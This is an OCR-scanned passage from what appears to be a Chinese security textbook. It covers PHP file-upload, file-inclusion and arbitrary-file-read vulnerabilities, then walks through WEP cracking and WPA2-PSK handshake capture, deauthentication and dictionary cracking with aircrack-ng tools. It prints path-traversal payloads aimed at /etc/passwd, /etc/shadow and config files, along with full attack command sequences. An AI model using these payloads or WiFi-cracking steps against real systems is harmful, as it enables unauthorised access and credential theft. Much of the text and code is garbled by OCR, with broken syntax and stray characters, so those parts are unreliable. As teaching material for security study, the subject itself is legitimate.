rename($user dat['usrdir'] . “/" . $ FILES[$whichfile]['name'], $изег_ 


dat['usrdir'] . "/" . $split img[0] . "." . strtolower($split img[1])); 


这 里 会 将 之 前 上 传 的 xx.jpgphp 改 名 为 xx.jpg。 但 根据 rename 函 数 特性 ， 当 二 次 上 传 同 
名 文件 时 ， 例 如 xx.jpg.php， 紧 接着 会 进入 流程 ， 尝 试 被 改名 为 xx.jpg， 但 因为 xx.jpg 已 经 
存在 了 ， 所 以 成 功 上 传 了 xx.jpg.php。 


47 文件 包含 


文件 包含 也 是 PHP 中 常见 的 一 种 漏洞 ， 其 结果 往往 就 是 getshell， 其 危害 极 大 。 那 什 
么 是 文件 包含 昵 ?” 它 往往 出 现在 include()、 include once(). require(). require once(). 
fopen、file_get_contents 这 些 加 载 文件 的 函数 上 。 因 为 对 文件 名 没有 过 滤 ， 导 致 攻击 者 可 以 
包含 任意 文件 或 特定 文件 ， 从 而 达到 攻击 目的 。 


4.7.1 漏洞 成 因 
问题 代码 如 下 。 


<?php 
if ($ GET['dir']) ( 
include $ GET['dir']; 
) else ( 
include 'test.php'; 
} 


?» 


这 段 代 码 的 初衷 应 该 是 想 调用 某 文件 的 样式 和 功能 。 但 因为 这 里 dir 为 用 户 可 控 ， 所 以 
可 以 调用 任意 文件 。 而 问题 就 在 于 此 ， 如 果 攻 击 者 上 传 一 个 尾部 有 PHP 恶 意 代 码 的 图 片 ， 
如 upload/xx.jpg， 再 访问 ?dir=upload/xx.jpg， 那 么 恶意 代码 就 会 被 引入 当前 文件 并 执行 ， 
从 而 达到 攻击 目的 。 

当然 ， 文 件 包含 并 不 仅 限于 包含 上 传 的 文件 ， 也 可 以 包含 一 些 配 置 文件 。 


?dir-.htaccess 


2dir=../../../../../../web.config 

Зат ЕЕРЕЕ --fvar/iog/apache/error-iog 
zair a Иа 7-7 7 72 77 -./proc/config.gz | Sroot4Xfi ) 
?dirc../../ E 4 d oa LM... 4. /etc/shadow ( Жгоос Я ) 


5 2: 
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4.7.2” 绕 过 限制 
在 实际 开发 中 ， 开 发 者 为 了 避免 受 其 害 ， 对 包含 的 路 径 做 了 很 多 限制 ， 如 下 面 这 段 代 码 。 


<?php 
if($ GET['dir'])( 
include ("inc/".$ GET['dir'].".htm"); 

} 

?> 

从 这 里 可 以 看 到 ， 开 发 者 对 目录 和 后 级 名 都 进行 了 控制 。 但 人 们 可 以 提交 ../ 轻 松 绕 过 
对 目录 的 限制 ， 同 时 用 %00 截 断 绕 过 对 后 缀 的 限制 。 如 ?dir=../../../../../../../etc/passwd， 从 而 
包含 恶意 文件 。 

注意 : %00 截 断 需 要 magic_quotes gpc=off，PHP 版 本 小 于 5.3.4 时 才能 实现 。 

当然 ， 对 于 上 述 代 码 ， 还 有 其 他 方法 绕 过 其 限制 ， 如 路 径 长 度 截 断 “PHP 版 本 小 
于 5.2.8，Linux 下 文件 名 长 度 大 于 4096 字 节 ，Windows 下 长 度 大 于 256 字 节 ) 、 点 号 截断 
《PHP 版 本 小 于 5.2.8， 只 适用 于 Windows 系 统 ， 点 号 长 度 须 大 于 256 字 节 ) 等 。 

再 来 看 一 段 对 目录 进行 过 滤 的 代码 。 


<?php 

if($ GET['dir'])( 
$str-str replace("../","./",$ GET['dir']); 
include ("data/".$str); 

h 

px 

Print.php: 

«?php 
echo "test"; 


?> 


这 段 过 滤 代 码 是 用 str_replace 函 数 将 ../ 替 换 成 .,， 从 而 使 攻击 者 无 法 用 ../ 跳 出 目录 。 不 
过 当 提交 .…/ 时 ， 因 为 会 将 ../ 替 换 成 /， 所 以 又 再 次 变 成 了 ./， 从 而 跳出 了 目录 。 因 此 当 人 们 
提交 ?dir=.../printphp 时 ， 就 成 功 包含 了 文件 。 

测试 结果 如 图 4-23 所 示 。 


+ | Ə localhontphprd pic php 





[мт = e sO Х55- Encryption- Encoding- Other- 
@ loadURL 
SpitURL 
D teate 
17 Enable Postdata Г) Enable Referrer 
test 


图 4-23 包含 本 地 文件 


pos d. 
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4.7.3 任意 文件 读 取 


file get contents 是 最 常见 的 文件 读 取 函 数 ， 用 来 把 整个 文件 读 入 一 个 字符 串 中 。 语 法 格式 ; 

file get contents(path, include path, context, start, max length) 

也 就 是 我 们 常 说 的 任意 文件 读 取 ， 控 制 要 读 取 文 件 的 路 径 ， 从 而 达到 攻击 目的 ， 例 如 
读 取 一 些 数据 库 配 置 文件 等 。 

先 来 看 一 段 代 码 : 


<?php 

if($ GET['dir']){ 
$file=file get contents($ GET['dir']); 
echo $file; 

ў 


?> 


提交 ?dir=/data/web.config， 结 果 如 图 4-24 所 示 。 
Ф @ localhost/test.php?dir- data/web.config] 
=e S0 X95 Enayplior Encoding- Other 
«і Load URL 
Š  SpltuRL 
D Execute 
E) Enable Post data ^) Enable Referrer 
test 


Hl4-24 ” 读 取 本 地 文件 


48 本章 小 结 


随 着 网 络 的 普及 ， 商 业 网 站 、 政 府 网 站 、 个 人 博客 不 计 其 数 。 而 搭建 网 站 的 门槛 也 变 
得 越 来 越 低 ， 搭 建 过 程 开始 变 得 模式 化 、 智 能 化 ， 很 多 并 不 懂 网 站 开发 的 人 也 可 以 使 用 开 
源 软 件 搭建 属于 自己 的 网 站 ， 并 且 因 为 开源 软件 价格 低廉 ， 很 多 企业 、 政 府 也 会 选择 安全 
性 高 、 口 碑 好 的 开源 软件 进行 网 站 搭建 。 因 此 ， 开 源 软 件 的 安全 性 显得 尤为 重要 。 如 今 随 
着 PHP 被 广泛 使 用 ，PHP 在 开源 市 场 的 地 位 越 来 越 高 ， 这 里 以 小 结 的 形式 来 讲 讲 开源 审计 
的 经 验 。 

在 审计 一 开始 ， 首 先 应 该 通读 全 局 文件 ， 看 看 有 没有 做 一 些 全 局 过 滤 ， 并 且 大 致 了 解 
程序 的 结构 。 如 果 做 了 全 局 过 滤 ， 那 可 以 尝试 对 过 滤 代 码 进行 bypass， 一 旦 bypass 成 功 便 
Je A BEI. 

在 审计 中 ， 应 特别 留意 用 户 可 控 的 参数 。 而 对 于 可 控 参 数 的 查找 ， 可 以 检索 一 些 传 参 
数组 ， 使 审计 更 加 高 效 ， 常 见 的 传 参数 组 如 表 4-1。 
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表 4-1 常见 传 参数 组 


* Xx 
服务 器 环境 变量 数组 
通过 GET 方 式 传递 给 脚本 的 变量 数组 
通过 POST 方式 传递 给 脚本 的 变量 数组 
Cookie 变 量 数组 
包括 了 $_GET、$_ POST、$_COOKIE 等 数组 
文件 上 传 数组 


























当 找 到 可 控 参 数 时 ， 就 可 以 分 析 其 进行 了 几 次 传递 ， 有 没有 进入 查询 语句 ， 经 历 了 几 
个 函数 。 而 说 到 函数 ， 在 PHP 审 计 中 ， 高 危 函 数 的 查找 也 是 极其 高 效 的 方法 之 一 ， 常 见 的 
高 危 函数 如 表 4-2 所 示 。 


armay map 


include0 





在 开源 程序 中 ， 出 现 更 多 的 是 二 次 漏洞 。 可 以 想象 一 下 ， 假 如 现在 有 很 多 物品 需要 
带 走 ， 但 一 次 带 不 了 那么 多 ， 那 可 以 分 两 次 拿 。 二 次 漏洞 也 是 如 此 ， 把 一 次 攻击 分 两 次 进 
行 ， 但 能 达到 一 样 的 目的 ， 并 且 这 种 漏洞 的 隐蔽 性 较 高 ， 在 大 中 型 开源 软件 中 也 常常 出 
现 ， 同 时 这 一 类 漏洞 相对 一 次 漏洞 而 言 更 耗 脑力 ， 更 考验 审计 者 的 耐心 和 体力 。 

当然 代码 审计 中 出 现 的 漏洞 远 不 止 本 章 所 说 的 这 些 ， 还 有 如 拒绝 服务 、CSRF、 平 行 
权限 、Cookie 验 证 绕 过 等 。 
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无 线 安全 或 许 是 目前 这 本 书 中 离 读 者 最 近 的 一 个 领域 了 ， 通 过 前 面 章 节 的 学 习 可 以 知 
道 ，Web 问 题 通常 出 现在 服务 器 上 ， 代 码 审计 也 需要 长 时 间 的 经 验 积累 ， 但 无 线 安全 的 隐 
患 ， 却 就 在 人 们 身边 。 

本 章 从 多 角度 剖析 了 无 线 安 全 ， 从 基本 原理 入 手 ， 然 后 切入 算法 安全 ， 阑 述 无 线 通信 
中 加 密 算法 的 应 用 与 破解 ， 接 着 协议 安全 解析 了 多 个 标准 协议 的 特性 并 指出 破绽 所 在 以 及 
漏洞 的 利用 方法 ;通信 安全 分 析 了 无 线 通信 过 程 中 传输 内 容 的 信息 获取 和 解读 ;， 杂 项 应 用 
讲解 了 在 更 广 范围 的 无 线 安全 领域 中 的 各 类 技术 应 用 和 应 对 措施 。 

这 个 章节 涉及 的 理论 知识 很 多 ， 可 能 对 部 分 读者 来 说 有 些 难度 ， 读 者 可 在 本 章 基 础 上 
自行 寻找 一 些 感 兴趣 的 知识 ， 我 们 也 会 在 Mapers.net 持 续 更 新 相关 知识 技能 。 





5.2 无线 安 全 基本 原理 


无 线 安全 指 的 是 无 线 通信 安全 。 一 台 设 备 中 的 信息 通过 调制 从 天 线 发 出 ， 另 一 台 设备 
经 过 滤波 之 后 解 调 信号 ， 获 得 信息 。 在 这 个 通信 的 过 程 中 所 有 发 射 的 信息 都 是 广播 的 ， 也 
就 是 说 任何 人 在 一 定 范围 内 放 一 根 天 线 都 能 接收 到 这 个 信号 ， 这 就 是 无 线 安全 所 有 应 用 的 
根本 前 提 : 如 果 数 据 会 被 别人 获取 ， 那 有 什么 解决 方法 。 


524 无 线 通信 


无 线 通信 在 传输 的 过 程 中 通常 是 加 密 进 行 的 ， 有 时 由 于 设备 性 能 等 多 种 原因 会 选择 不 
加 密 ， 这 种 情况 称 为 透明 传输 ， 简 称 透 传 。 透 传 的 信号 非常 容易 被 解密 ， 因 此 是 较为 不 安 
全 的 。 只 要 攻击 者 有 合适 的 设备 来 截取 信号 ， 配 合 特定 的 开源 软件 ， 就 可 以 根据 公开 的 协 
议 进行 解密 ， 然 后 获得 数据 ， 这 就 是 读者 所 熟知 的 “无 线 抓 包 ”。 


522 ”加 密 与 算法 


既然 直接 传输 不 安全 ， 那 肯定 就 要 考虑 加 密 传输 了 。 加 密 的 原理 就 是 将 数据 编码 ， 以 
至 于 获取 到 数据 的 人 并 非 都 能 解读 其 中 的 内 容 ， 没 有 密 钥 或 者 解密 方法 的 人 得 到 了 加 密 过 
的 数据 也 只 能 干 瞪眼 ， 而 无 法 获取 其 中 的 信息 (这 里 不 考虑 算法 的 有 效 性 和 暴力 破解 的 可 
能 ) 。 所 以 加 密 这 种 操作 ， 在 无 线 传输 这 种 跨 过 多 层 进 行 的 传输 中 ， 只 要 有 任何 一 层 通 信 
做 了 加 密 ， 通 信和 即 可 被 认为 是 安全 的 。 比 如 WiFi 没 有 加 密 ， 但 是 你 使 用 了 加 密 的 VPN 或 者 
代理 来 连接 外 部 网 站 ， 那 么 你 和 该 网 站 之 间 的 通信 依然 是 安全 的 。 

算法 是 指 程序 为 实现 某 一 目的 所 执行 的 步骤 。 加 密 算法 就 是 指 程序 在 对 数据 加 密 的 过 程 中 
所 执行 的 具体 步骤 以 及 计算 的 方法 。 常 见 的 加 密 算法 有 AES、DES、RC4、RSA 等 。 


PE 
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523 ”操作 系统 与 实现 


无 线 安 全 在 实践 的 过 程 中 通常 会 涉及 操作 系统 的 原理 。Windows 系 统 因为 内 核 阻 隔 了 
程序 直接 与 硬件 交互 的 权限 ， 使 得 程序 只 能 通过 Windows 的 API 来 实现 与 硬件 的 交互 ， 以 
至 于 想 在 Windows 下 使 网 卡 进入 监视 (Monitor) 状态 是 一 件 很 困难 的 事 。 由 于 这 个 原因 ， 
接 下 来 的 内 容 都 基于 Linux 系 统 。Linux 是 开源 系统 ， 具 有 更 好 的 开放 性 ， 故 被 广泛 地 用 于 
渗透 测试 中 。 无 线 安 全 中 最 常见 的 Aircrack-ng 工 具 套件 虽然 也 有 Windows 版 本 ， 但 是 使 用 并 
不 方便 。Linux 下 的 网 络 硬件 会 被 做 一 些 特定 的 标记 ， 比 如 eth0 表 示 第 一 个 以 太 网 卡 〈 面 向 
高 级 用 户 的 程序 通常 使 用 0 来 表示 第 一 个 元 素 ) ，lo 表 示 回 路 〈 这 是 一 个 特殊 的 网 络 设备 ， 
表示 回路 ， 在 Linux 下 的 ping 127.0.0.1 就 是 通过 这 个 虚拟 网 络 设备 实现 的 ) 。 无 线 网 卡通 常 
会 被 标注 为 wlan0， 这 是 正常 模式 。 当 使 用 工具 将 网 卡 载 入 moniter 模 式 时 ， 网 卡 标记 会 变 为 
mon0， 这 是 Linux 下 的 设备 名 ， 所 有 程序 与 硬件 直接 进行 的 交互 操作 都 将 使 用 该 设备 名 作为 
交互 对 象 。 由 于 Linux 较 为 严格 的 权限 管理 ， 程 序 与 硬件 直接 交互 需要 系统 的 最 高 权限 ， 也 
就 是 root 权 限 ， 请 在 root 权 限 下 执行 无 线 渗透 测试 套件 (Kali 和 BT 系列 等 专用 的 渗透 测试 系统 
通常 默认 权限 就 是 root) 。 这 里 笔者 推荐 在 Ubuntu 系统 下 搭建 适合 自己 的 环境 ， 当 然 读者 还 
可 以 使 用 集成 了 工具 的 BackBox、Kali 等 系统 ， 这 对 于 不 熟悉 Linux 的 新 手 会 很 方便 。 
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5.3.1 概述 


加 密 通 信 最 核心 的 部 分 就 是 算法 ， 这 一 节 主 要 介绍 无 线 安 全 中 的 算法 安全 。 不 管 是 
WEP、WPA 还 是 更 多 的 加 密 方式 ， 都 必须 使 用 加 密 算法 加 密 ， 一 旦 加 密 算法 有 漏洞 或 者 
密 钥 被 破解 〈 如 果 是 有 密 钥 的 加 密 算法 ) ， 一 切 加 密 便 成 了 空谈 。 

目前 整个 互联 网 的 安全 可 以 说 都 是 基于 加 密 算法 的 ， 最 早 的 时 候 只 有 对 等 加 密 算法 
(加 解密 使 用 相同 的 密 钥 ) ， 后 来 出 现 了 不 对 等 加 密 〈 加 解密 使 用 一 对 密 钥 ， 加 密 用 其 中 
一 个 ， 解 密 只 能 用 另 一 个 ) 以 及 以 MD5S 算 法 为 代表 的 不 可 道 加 密 。 因 为 有 了 不 对 等 加 密 ， 
可 以 在 不 预先 共享 密 钥 的 前 提 下 进行 加 密 通 信 。HTTPS 加 密 的 通信 方式 以 及 OpenSSL 可 以 
说 是 世界 互联 网 安全 的 基石 ， 而 不 可 逆 加 密 算法 (摘要 算法 ) 则 是 网 络 安全 的 重要 保证 。 
MD5 算 法 在 网 站 后 台中 实现 了 在 对 用 户 进行 密码 鉴 权 的 同时 不 保存 用 户 密码 ， 保 证 了 用 户 
信息 的 安全 。 

下 面 将 演示 如 何 进 行 无 线 渗透 测试 ， 目 的 是 获取 密 钥 ， 笔 者 将 用 两 个 无 线 网 络 作为 实 
例 ， 一 个 采用 WEP 加 密 ， 一 个 采用 WPA-PSK 加 密 。 

Tips: 如 果 读 者 想 使 用 独立 的 Linux 系 统 来 练习 ， 可 以 尝试 直接 UDU 盘 启动 BackBox 等 
渗透 测试 系统 ， 如 果 打 算 安装 独立 的 Linux 系 统 ， 在 分 区 和 安装 系统 的 部 分 一 定 要 非常 小 
心 ，Linux 采 用 了 完全 不 同 的 文件 系统 ， 安 装 的 时 候 若 选择 不 当 很 可 能 会 丢失 数据 。 自己 
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在 硬盘 上 搭建 渗透 测试 环境 的 话 ， 可 以 直接 安装 Kali/Backbox 或 者 基于 Ubuntu 安装 所 需 的 
工具 。 另 外 虚拟 机 下 的 Linux 不 支持 笔记 本 的 内 置 网 卡 ， 包 括 ExpressCard 网 卡 都 不 支持 ， 
只 能 使 用 USB 网 卡 。 


5.89.20 WEP 


WEP 协 议 使 用 RC4 加 密 ，RC4 本 来 是 一 种 私有 加 密 算法 ， 但 是 后 来 被 人 公开 了 ， 运 用 
就 变 得 广泛 起 来 ， 但 是 其 实 很 不 安全 。WEP 的 易 破解 性 和 ShadowSocks 中 使 用 RC4 加 密 的 
不 安全 性 都 证 明了 这 一 点 。RC4 是 流 加 密 算法 的 一 种 ， 同 一 个 子 密 钥 绝 不 能 使 用 两 次 ， 
所 以 使 用 (虽然 是 用 明文 传送 的 ) IV 的 目的 就 是 要 避免 重复 ; 但 是 24bit (3 个 Byte) 的 
IV 实在 太 短 了 ， 在 稍微 繁忙 的 网 络 上 都 极 易 产 生 重 复 ， 而 且 IV 的 使 用 方式 也 使 其 可 能 遭 
受到 关联 式 钥 匙 攻击 。 具 体 笔 者 不 做 细节 分 析 ，RC4 算 法 主要 是 对 数据 进行 了 打 乱 〈 重 
排 ) ， 使 得 数据 混淆 ， 而 没有 加 干扰 ， 这 使 得 RC4 被 普遍 认为 是 一 种 不 安全 的 算法 ， 因 为 
在 数据 中 没有 密 钥 长 度 。 在 WEP 的 破解 过 程 中 只 要 截获 足够 多 的 数据 包 就 可 以 得 到 密 钥 ， 
而 使 用 密 钥 则 可 以 监听 并 解密 所 有 的 数据 包 。 

(1) 打开 终端 。 

(2) 输入 sudo-i， 然 后 根据 提示 输入 Linux 管 理 员 账 户 、 密 码 ， 按 回 车 键 〈 输 入 密码 
的 时 候 屏 幕 上 不 会 显示 密码 或 星 号 ， 但 不 代表 你 密码 没 输 进 去 ) ， 下 一 行 命令 开头 的 $ 变 
为 # 则 代表 成 功 〈 提 示 符 已 是 # 的 忽略 此 步骤 ) 。 

(3) 输入 apt-get update 更 新 软件 源 。 

(4) 输入 apt-get install aircrack-ng〔 渗 透 测 试 系统 忽略 此 步骤 ) 。 

(5) 先 测试 无 线 网 卡 能 不 能 用 ， 使 用 命令 iwconfig， 如 果 出 现 了 某 一 个 网 卡 后 面 有 比 
较 详细 的 信息 就 请 记 住 它 左边 的 字符 ， 这 里 是 wlan0( 见 图 5-1)。 


















































图 5-1 iwconfig 命 令 返 回信 息 
(6) 将 网 卡 设 定 为 监控 模式 ， 输 入 airmon-ng start wlan0( 将 wlan0 替 换 为 你 使 

















iwconfig 查 到 的 字段 ) ， 如 图 $-2 所 示 。 


= Mo 
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root@bronco-U31SG: /home/bronco# airmon-ng start wlan@ 


Found 5 proc hat could cause trouble. 
If airodump-ng, aireplay-ng or airtun-ng stops working after 
а short period of time, you may want to kill (some of) them! 


Name 
avahi-daemon 
avahi-daemon 
NetworkManager 
wpa supplicant 
dhclient 


Chipset Driver 


Atheros ath9k - [phye] 
(monitor mode enabled оп топе) 


图 5-2 airmon-ng 命 令 正确 返回 信息 
CI) 使 用 ifconfig 确认 网 卡 已 进入 监控 模式 ， 在 终端 输入 ifconfig 命 令 ， 将 在 结果 中 看 
到 mon0 字 样 的 网 络 设备 ， 如 图 5-3 所 示 。 

















00-00-00-00-00-00 
跃 点 数 :1 
9 过 载 :6 载 


度 :1666 
4 кв) 发送 字 节 :6 


图 5-3 正确 设置 网 卡 为 监听 模式 后 所 能 看 到 的 信息 
(8) 安装 minidwep-gkk。 常 用 的 渗透 测试 系统 都 自 带 了 这 个 软件 ， 从 软件 发 布 的 源码 
说 明 来 看 ， 作 者 应 该 是 中 国人 如 图 5-4 所 示 〉。 
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图 5-4 minidwep-gtk5 ri 
(9) 使 用 minidwep-gtk 破解 WEP 密 码 。 由 于 WEP 的 各 种 协议 漏洞 ， 使 得 破解 WEP 的 
密码 变 得 极为 容易 ， 甚 至 有 这 种 全 自动 工具 产生 。 破 解 方法 很 简单 ， 单 击 Scan 搜索 WiFi， 
选择 加 密 方 式 为 WEP 的 热点 ， 然 后 单 击 Lanch 按 钮 〈 应 该 是 Launch， 开 发 者 打 错 字 了 ) ， 
只 要 信号 够 好 ， 没 几 分 钟 就 能 在 右边 看 到 密码 了 。 
以 上 是 破解 WEP 密 码 的 方法 。 由 于 破解 过 程 极为 简单 ，WEP 这 样 的 加 密 方式 在 当前 
的 安全 环境 中 已 基本 失去 了 价值 。 
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5.3.3 WPA(2)PSK 


WPA 和 WPA2 是 现在 主流 的 两 种 加 密 方法 ， 这 两 种 加 密 方 法 其 实 都 具有 很 高 的 安全 
性 ， 它 们 本 身 都 是 企业 级 的 安全 加 密 标准 ， 需 要 使 用 Radius 服 务 器 来 进行 用 户 鉴 权 。 使 
用 Raidus 服 务 器 做 认证 时 AP 会 自动 开放 一 条 从 客户 端 到 认证 服务 器 的 通道 ， 因 此 认证 
方法 极为 自由 ， 可 以 是 用 户 名 、 密 码 或 者 是 证 书 ， 还 可 以 是 其 他 方法 。 一 旦 用 户 通过 了 
服务 器 的 鉴 权 ， 服 务 器 返回 同意 连接 的 信息 到 AP 上 ， 至 此 客户 端 就 连接 上 了 一 个 WPA/ 
WPA2 认 证 的 AP。 由 于 Radius 服 务 器 部 署 的 不 便捷 性 和 高 成 本 ， 在 个 人 应 用 中 ， 通 常 使 
用 WPA-PSK 或 者 WPA2-PSK 作 为 加 密 方 法 ，PSK 的 意思 是 pre-shared key， 即 预 共 享 密 
钥 。 简 单 地 说 就 是 在 用 户 访问 之 前 将 访问 密码 告诉 用 户 ， 用 户 得 到 密码 之 后 就 使 用 这 个 
密码 来 连接 热点 。 

WPA2 和 WPA 的 区 别 是 算法 ，WPA 和 WEP 一 样 都 使 用 了 RC4 算 法 ， 但 是 WPA 拓 展 
了 IV 的 位 数 ， 使 得 IV 远 远 没有 WEP 中 那么 容易 重复 ， 想 等 到 两 个 相同 IV 的 包 变 得 异常 
困难 。 同 时 在 RC4 算 法 的 基础 上 为 每 个 包 引 入 了 单独 的 密 钥 (per-packet key 机 制 ) ， 
使 截获 正常 的 通信 数据 包 对 密 钥 的 破解 不 再 有 帮助 。 密 钥 通过 算法 进行 不 可 逆 运 算 之 
后 的 数据 只 会 在 握手 包 中 出 现 。 所 以 WPA 的 监听 必须 在 监听 到 握手 包 之 后 才能 获得 有 
可 能 解密 的 数据 包 ， 而 真正 解密 需要 等 到 破解 了 密码 。 解 密 WPA 数 据 包 也 是 一 个 麻烦 的 
过 程 ， 因 为 这 种 运算 的 不 可 逆 性 ， 必 须 使 用 密码 字典 中 的 密码 逐个 做 同样 的 运算 ， 尝 试 能 
和 否 得 到 一 样 的 结果 。 这 样 的 运算 量 较 WEP 无 疑 是 巨大 的 ， 而 且 浮 点 运算 对 于 CPU 是 一 件 非 
常 吃力 的 事 〈 比 特 币 也 是 浮 点 运算 ) ， 所 以 通常 会 使 用 显卡 或 者 专门 的 FPGA 计 算 卡 来 猜 
测 密码 。 

WPA2 人 允许 使 用 AES 算 法 。AES 是 高 级 加 密 标准 ， 是 一 种 加 密 强 度 和 加 解密 速度 都 高 
于 DES 的 算法 。AES128 在 AES 标 准 中 的 加 密 强 度 最 低 ， 但 是 这 样 的 加 密 强 度 对 破解 时 间 
的 要 求 已 经 远 超人 类 历史 了 ， 所 以 是 很 安全 的 东西 (当然 不 能 排除 存在 算法 漏洞 )。 

现在 WEP 热 点 已 经 非常 少见 了 ， 根 据 需 求 ， 一 般 人 要 么 选择 不 加 密 ， 要 么 选择 WPA 
加 密 ， 而 不 会 选择 WEP 这 种 加 密 强 度 低 、 又 不 向 他 人 开放 网 络 的 方法 。 

WPA(2)-PSK 加 密 的 破解 无 疑 是 非常 困难 的 ， 后 来 由 于 快速 连接 CWPS/QSS) 方法 的 
出 现 ， 可 以 使 破解 变 得 更 加 有 效 ， 但 是 不 能 像 传统 方法 一 样 抓 到 包 后 离开 热点 范围 慢 慢 破 
解 ， 而 需要 将 设备 置 于 热点 周边 几 个 小 时 ， 等 待 破解 完毕 。 

本 书 重点 是 信息 安全 而 不 是 讲解 如 何 中 网 ， 笔 者 认为 WPS/QSS 法 在 实际 的 渗透 过 程 
中 没有 什么 价值 ， 毕 竟 没 有 一 个 可 以 让 你 进行 几 小 时 渗透 的 环境 ， 故 这 里 只 讲解 抓 握 手包 
的 方法 。 

下 面 讲解 WPA(2)-PSK 网 络 的 破解 方法 ， 笔 者 直接 从 网 卡 进入 了 监视 模式 之 后 开始 
写 ， 前 几 步 和 之 前 所 介绍 的 内 容 是 一 样 的 。 

(1) 使 用 airodump-ng mon0 查 看 当前 的 所 有 无 线 网 络 ， 并 获取 详细 信息 〈 见 图 $-5) 。 
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root@bronco-U31SG: /home/bronco 


CH -1 ][ Elapsed: 5 mins ][ 2015-02-27 12:08 
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图 5-5 airodump-ng 界 面 
airodump-ng 的 结果 随 着 时 间 的 推进 会 越 来 越 多 ， 上 面 一 组 结果 是 AP 的 信息 ， 下 面 的 
是 客户 端的 信息 ， 当 目标 AP 出 现在 了 上 面 一 组 结果 的 时 候 就 可 以 按 Ctrl+C 组 合 键 收 手 了 。 
这 里 第 2 条 c103 就 是 笔者 的 目标 。 
(2) 记录 一 下 目标 AP 的 BSSID (MAC 地 址 ) 和 频段 〈 此 处 为 6) ， 然 后 执行 
airodump-ng -c 频段 --bssid mac 地 址 -w 保存 抓 到 的 数据 包 的 文件 名 mon0， 如 图 $-6 所 示 。 
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图 5-6 airodump-ng 命 令 示例 
然后 终端 会 进入 如 图 5-7 所 示 的 界面 。 


][ Elapsed: 56 s ][ 2015-02-27 19:35 ][ fixed channel топе: -1 





PWR RXQ Beacons — sData, #/5 СН MB ЕМС CIPHER AUTH ESSID 


-66 100 54e. WPA2 CCMP PSK c103 


STATION Lost Packets Probes 


3193 
3950 





5-7 ”加 筛选 的 airodump-ng 界 面 





п — 


—ONNN 





黑客 与 安全 技术 指南 











Waiting for beacon frame (BSSID: D 
Couldn't determine current channel for mone, 
ration with --ignore-negative-one or apply a kern 
Please specify an ESSID (-e) 
oote@bronco-U31SG:/home/bronco# | 





正常 情况 下 上 方 只 会 出 现 一 个 BSSID， 下 方 的 信息 条 数 是 当前 发 现 的 客户 端 数量 ， 如 
果 没 有 发 现 客 户 端 则 无 法 进行 攻击 ， 当 发 现 了 客户 端 之 后 就 可 以 进行 重 放 攻击 抓 取 握 手包 
了 。 图 5-7 中 第 二 个 客户 端 是 笔者 的 手机 ， 下 面 笔者 将 使 月 
的 联系 。 

(3) 开启 一 个 新 终端 (获取 root 权 限 ) ， 进 行 重 放 攻 击 ， 输 入 aireplay-ng -0 10 -a 
BSSID -c 客户 端 地 址 (station 列 ) mon0， 如 图 5-8 所 示 。 


oot@bronco-U31SG: /home/bronco# aireplay-ng -© 10 -a DO: 


目 重 放 攻 击 ， 并 捕获 它 和 AP 之 间 


-c CC:FA: 


E7) on channel -1 
you should either force t 
el patch 


图 5-8 许多 计算 机 在 使 用 aireplay-ng 时 会 出 现 的 问题 
此 时 出 现 了 一 个 问题 ， 就 是 没有 做 过 特殊 处 理 的 内 核 可 能 会 导致 mon0 返 回 频段 为 -1 
(不 存在 的 频段 } ， 根 据 提示 可 以 使 用 --ignore-negative-one 忽 略 这 个 问题 。 执 行 成 功 后 会 
出 现 如 图 $-9 所 示 的 画面 ， 这 时 可 以 进行 下 一 步 ， 和 否则 可 能 是 信号 原因 ， 请 多 重 试 几 次 。 





/home/bronco# aireplay-ng -0 10 -a DO: 


nore-negative-one топе 
for beacon 
ing 64 directed 
g 64 directed 
Sending 64 directed 
Sending 64 directed 
Sending 64 directed 
64 directed 

ing 64 directed DeAuth. 

ing 64 directed DeAuth. 

ing 64 directed DeAuth. 

64 directed DeAuth. 

oot@bronco-U3 ome/bronco# | 





0:CB:B3:E7 -c CC:FA: 


图 5-9 aireplay-ng 攻 击 成 功 返 回信 息 


(4) 在 airodump 的 终端 里 按 Ctrl+C 组 合 键 结束 进程 ， 





然后 用 aircrack-ng 跑 密码 。 常 


命令 aircrack-ng -w 字典 文件 -b bssid 地 址 cap 文 件 名 ， 如 图 5-10 所 示 。 


ronco-U31S home/broncos aircrack-ng 





miaomiao-01.cap 
图 5-10 aircrack-ng 命 令 示例 


按 回 车 键 进入 跑 包 ?界面 ， 如 图 5-11 所 示 。 


Atrcrack-ng 1.1 





[00:00:00] 4 keys tested (339.76 k/s) 


KEY FOUND! [ (Ө) ] 


г Key : 28 F9 өс 34 gD F3 31 F9 
59 C1 36 A5 54 21 3A 


Transient Key : 5 00 47 Аб 37 01 DB 38 26 69 5А 30 


EAPOL HMAC : FA SC BE 9 TD BF 94 99 0С 50 





图 5-11 ”aircrack-ng 爆 破 密码 成 功 返 
Ф 跑 包 ， 指 用 字典 与 握手 包 进行 核对 。 


回信 息 
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此 处 笔者 为 节省 时 间 直 接 把 正确 密码 放 入 字典 了 ， 所 以 瞬间 就 跑 出 了 结果 。 
以 上 就 是 破解 WPA(2)-PSK 加 密 的 全 过 程 。 


5.4.1 概述 


无 线 通信 作为 一 种 通信 方式 ， 最 核心 的 部 分 自然 是 信息 本 身 。 本 节 着 重 关注 信息 在 无 
线 网 络 传递 过 程 中 的 安全 问题 ， 将 使 读者 对 无 线 网 络 环境 中 传输 信息 的 安全 性 以 及 针对 信 
息 内 容 的 攻防 手段 有 所 了 解 。 


5.4.2 加密 网 络 渗透 


通常 情况 下 ， 大 多 数 人 破解 无 线 网 络 可 能 只 是 为 了 “ 蹦 网 ”， 也 就 是 获得 访问 权限 ， 
但 是 黑客 破解 热点 的 另 一 重 意义 是 为 自己 在 一 个 安全 的 网 络 环境 中 打开 一 个 突破 口 。 破 解 
无 线 热点 可 以 快速 侵入 防火 墙 内 部 〈 相 对 于 从 外 部 穿 透 NAT) ， 从 而 进入 内 网 渗透 阶段 。 
这 样 的 情景 通常 会 出 现在 社工 渗透 或 者 APT 中 ， 同 时 目的 也 不 仅 是 可 以 上 网 那么 简单 ， 而 
是 窃取 信息 。 此 时 人 们 保卫 的 不 仅仅 是 带宽 和 网 络 资源 ， 更 是 网 络 的 信息 安全 。 


5.4.3 通信 监听 


很 多 企业 会 采用 另外 一 种 无 线 内 网 的 部 署 方式 ， 即 透 传 无 线 网 + 登录 界面 。 比 较 典 型 
的 解决 方案 是 H3C 提 供 的 IMC Portal。 笔 者 工作 的 地 方 也 采用 了 这 套 方案 来 实现 局 域 网 的 
管理 。 当 用 户 连 接 上 该 网 络 后 ， 将 不 能 获得 Internet 及 其 他 同 局 域 网 计算 机 的 访问 权限 ， 
